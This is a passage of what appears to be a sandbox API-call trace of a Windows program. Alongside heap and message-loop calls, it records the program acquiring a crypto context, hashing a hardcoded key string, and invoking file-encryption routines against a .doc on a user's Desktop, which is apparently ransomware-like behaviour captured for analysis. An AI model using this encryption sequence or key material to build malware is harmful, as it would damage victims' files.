hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0131.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0131.317] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0131.317] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0131.317] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0131.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0131.318] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0131.318] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0131.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca9e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0131.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0131.319] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0131.319] CloseHandle (hObject=0x2a0) returned 1 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0131.319] FreeLibrary (hLibModule=0x772d0000) returned 1 [0131.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0131.319] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.319] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.320] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0131.320] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.320] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\D-AgzySFKdtUp0Q.doc", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63fe0ce0, ftCreationTime.dwHighDateTime=0x1d5e9f9, ftLastAccessTime.dwLowDateTime=0x1c3d5830, ftLastAccessTime.dwHighDateTime=0x1d5f006, ftLastWriteTime.dwLowDateTime=0x1c3d5830, ftLastWriteTime.dwHighDateTime=0x1d5f006, nFileSizeHigh=0x0, nFileSizeLow=0x4c98, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="D-AgzySFKdtUp0Q.doc", cAlternateFileName="D-AGZY~1.DOC")) returned 0x41ac440 [0131.320] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0131.320] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.320] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0131.320] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.320] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0131.320] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.321] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.321] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0131.321] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.321] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.321] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.321] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.321] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0131.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0131.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0131.322] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0131.323] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.323] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.323] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0131.323] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.323] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.323] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.323] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.323] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.323] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0131.323] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.323] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.323] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.323] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.323] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.323] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.324] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.324] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0131.324] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.324] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.324] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0131.324] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.324] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0131.324] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.324] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0131.324] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0131.324] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0131.324] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.324] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.324] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.324] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.325] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.325] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0131.325] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cafb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0131.325] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0131.325] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.325] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.325] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.325] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0131.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0131.325] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0131.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0131.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0131.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2848 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0131.514] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0131.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2728 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e28a8 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0131.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2b18 [0131.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, 